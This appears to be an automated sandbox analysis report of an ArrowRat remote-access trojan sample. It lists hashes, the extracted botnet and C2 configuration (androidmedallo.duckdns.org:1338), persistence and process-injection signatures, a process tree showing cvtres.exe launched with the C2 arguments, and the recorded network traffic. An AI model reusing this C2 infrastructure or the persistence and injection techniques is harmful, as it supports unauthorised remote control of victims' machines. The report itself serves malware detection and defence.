Analysis

  • max time kernel
    147s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04-05-2023 12:31

General

  • Target

    arrow/150c06bc4cba9064302fb96f2b3565f433b43847b6d59448ce15b9024e6c9b0a.exe

  • Size

    138KB

  • MD5

    a771f2894d94322a49b0ce2e14493a3e

  • SHA1

    63cd63601410fe6be499a9102cbbd6c675e72f56

  • SHA256

    150c06bc4cba9064302fb96f2b3565f433b43847b6d59448ce15b9024e6c9b0a

  • SHA512

    ab75a88fbc2a8fd5320fdddb525af9a70c3553fa33b967545d4491a0ecd2e24869caeea49fdd7324d4ed666c42b8f5444c474056dddda0746af135bb97478765

  • SSDEEP

    3072:6bvA5mz7Bqh1v59Y08mAjs0Ltel+qOeJHlpV8b+Y/Yd:6bv4S7BqjjYHdrqkL/

Malware Config

Extracted

Family

arrowrat

Botnet

AG35PW

C2

androidmedallo.duckdns.org:1338

Mutex

ZD2651

Signatures

  • ArrowRat

    Remote access tool with various capabilities first seen in late 2021.

  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
  • Modifies Installed Components in the registry 2 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious use of SetThreadContext 1 IoCs
  • Checks SCSI registry key(s) 3 TTPs 22 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies registry class 35 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 21 IoCs
  • Suspicious use of FindShellTrayWindow 49 IoCs
  • Suspicious use of SendNotifyMessage 21 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\arrow\150c06bc4cba9064302fb96f2b3565f433b43847b6d59448ce15b9024e6c9b0a.exe
    "C:\Users\Admin\AppData\Local\Temp\arrow\150c06bc4cba9064302fb96f2b3565f433b43847b6d59448ce15b9024e6c9b0a.exe"
    1⤵
    • Modifies WinLogon for persistence
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2580
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" AG35PW androidmedallo.duckdns.org 1338 ZD2651
      2⤵
        PID:804
      • C:\Windows\explorer.exe
        "C:\Windows\explorer.exe"
        2⤵
        • Modifies Installed Components in the registry
        • Enumerates connected drives
        • Checks SCSI registry key(s)
        • Modifies registry class
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        PID:3868
    • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
      "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
      1⤵
      • Modifies registry class
      • Suspicious use of SetWindowsHookEx
      PID:4288
    • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
      "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
      1⤵
      • Modifies registry class
      • Suspicious use of SetWindowsHookEx
      PID:3836

    Network

    • flag-us
      DNS
      176.122.125.40.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      176.122.125.40.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      97.97.242.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      97.97.242.52.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      217.106.137.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      217.106.137.52.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      androidmedallo.duckdns.org
      cvtres.exe
      Remote address:
      8.8.8.8:53
      Request
      androidmedallo.duckdns.org
      IN A
      Response
      androidmedallo.duckdns.org
      IN A
      46.246.14.12
    • flag-us
      DNS
      18.31.95.13.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      18.31.95.13.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      2.36.159.162.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      2.36.159.162.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      86.23.85.13.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      86.23.85.13.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      86.23.85.13.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      86.23.85.13.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      50.4.107.13.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      50.4.107.13.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      64.13.109.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      64.13.109.52.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      androidmedallo.duckdns.org
      cvtres.exe
      Remote address:
      8.8.8.8:53
      Request
      androidmedallo.duckdns.org
      IN A
      Response
      androidmedallo.duckdns.org
      IN A
      46.246.14.12
    • flag-us
      DNS
      androidmedallo.duckdns.org
      cvtres.exe
      Remote address:
      8.8.8.8:53
      Request
      androidmedallo.duckdns.org
      IN A
      Response
      androidmedallo.duckdns.org
      IN A
      46.246.14.12
    • 52.242.97.97:443
      tls
      1.6kB
      9
    • 46.246.14.12:1338
      androidmedallo.duckdns.org
      cvtres.exe
      260 B
      5
    • 40.125.122.176:443
      260 B
      5
    • 20.189.173.14:443
      322 B
      7
    • 46.246.14.12:1338
      androidmedallo.duckdns.org
      cvtres.exe
      260 B
      5
    • 46.246.14.12:1338
      androidmedallo.duckdns.org
      cvtres.exe
      260 B
      5
    • 8.247.211.254:80
      322 B
      7
    • 46.246.14.12:1338
      androidmedallo.duckdns.org
      cvtres.exe
      260 B
      5
    • 8.247.211.254:80
      322 B
      7
    • 173.223.113.164:443
      322 B
      7
    • 46.246.14.12:1338
      androidmedallo.duckdns.org
      cvtres.exe
      260 B
      5
    • 46.246.14.12:1338
      androidmedallo.duckdns.org
      cvtres.exe
      260 B
      5
    • 46.246.14.12:1338
      androidmedallo.duckdns.org
      cvtres.exe
      208 B
      4
    • 8.8.8.8:53
      176.122.125.40.in-addr.arpa
      dns
      73 B
      159 B
      1
      1

      DNS Request

      176.122.125.40.in-addr.arpa

    • 8.8.8.8:53
      97.97.242.52.in-addr.arpa
      dns
      71 B
      145 B
      1
      1

      DNS Request

      97.97.242.52.in-addr.arpa

    • 8.8.8.8:53
      217.106.137.52.in-addr.arpa
      dns
      73 B
      147 B
      1
      1

      DNS Request

      217.106.137.52.in-addr.arpa

    • 8.8.8.8:53
      androidmedallo.duckdns.org
      dns
      cvtres.exe
      72 B
      88 B
      1
      1

      DNS Request

      androidmedallo.duckdns.org

      DNS Response

      46.246.14.12

    • 8.8.8.8:53
      18.31.95.13.in-addr.arpa
      dns
      70 B
      144 B
      1
      1

      DNS Request

      18.31.95.13.in-addr.arpa

    • 8.8.8.8:53
      2.36.159.162.in-addr.arpa
      dns
      71 B
      133 B
      1
      1

      DNS Request

      2.36.159.162.in-addr.arpa

    • 8.8.8.8:53
      86.23.85.13.in-addr.arpa
      dns
      70 B
      144 B
      1
      1

      DNS Request

      86.23.85.13.in-addr.arpa

    • 8.8.8.8:53
      86.23.85.13.in-addr.arpa
      dns
      70 B
      144 B
      1
      1

      DNS Request

      86.23.85.13.in-addr.arpa

    • 8.8.8.8:53
      50.4.107.13.in-addr.arpa
      dns
      70 B
      156 B
      1
      1

      DNS Request

      50.4.107.13.in-addr.arpa

    • 8.8.8.8:53
      64.13.109.52.in-addr.arpa
      dns
      71 B
      145 B
      1
      1

      DNS Request

      64.13.109.52.in-addr.arpa

    • 8.8.8.8:53
      androidmedallo.duckdns.org
      dns
      cvtres.exe
      72 B
      88 B
      1
      1

      DNS Request

      androidmedallo.duckdns.org

      DNS Response

      46.246.14.12

    • 8.8.8.8:53
      androidmedallo.duckdns.org
      dns
      cvtres.exe
      72 B
      88 B
      1
      1

      DNS Request

      androidmedallo.duckdns.org

      DNS Response

      46.246.14.12

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133277297551854914.txt

      Filesize

      75KB

      MD5

      65019a5db517d9fb830d8a57406a03ea

      SHA1

      817faf2ffe8461f653519e7bd96e7ee75021c891

      SHA256

      3ae88b3a99e6b785bdb44760790bc03ac722ef5b673ad5b3ca49b5cc5eecf84f

      SHA512

      bcc985d3fa48efcbb4a334b1a341a6686ef6c69f237d6d9bdcd9885696d148519ab824b9150194d783cb03189c1cc00a483f1b73ebce323f1f6a303a05b8ea62

    • memory/804-144-0x00000000061B0000-0x0000000006200000-memory.dmp

      Filesize

      320KB

    • memory/804-137-0x0000000005110000-0x00000000051A2000-memory.dmp

      Filesize

      584KB

    • memory/804-138-0x00000000051B0000-0x000000000524C000-memory.dmp

      Filesize

      624KB

    • memory/804-139-0x00000000059B0000-0x0000000005F54000-memory.dmp

      Filesize

      5.6MB

    • memory/804-140-0x0000000005930000-0x0000000005996000-memory.dmp

      Filesize

      408KB

    • memory/804-143-0x00000000052F0000-0x0000000005300000-memory.dmp

      Filesize

      64KB

    • memory/804-134-0x0000000000400000-0x0000000000416000-memory.dmp

      Filesize

      88KB

    • memory/804-275-0x00000000052F0000-0x0000000005300000-memory.dmp

      Filesize

      64KB

    • memory/2580-133-0x0000022D03130000-0x0000022D03158000-memory.dmp

      Filesize

      160KB

    • memory/3836-154-0x000001DFF40F0000-0x000001DFF4110000-memory.dmp

      Filesize

      128KB

    • memory/3836-157-0x000001DFF40B0000-0x000001DFF40D0000-memory.dmp

      Filesize

      128KB

    • memory/3836-161-0x000001DFF44C0000-0x000001DFF44E0000-memory.dmp

      Filesize

      128KB

    • memory/3868-148-0x00000000033A0000-0x00000000033A1000-memory.dmp

      Filesize

      4KB

    We care about your privacy.

    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.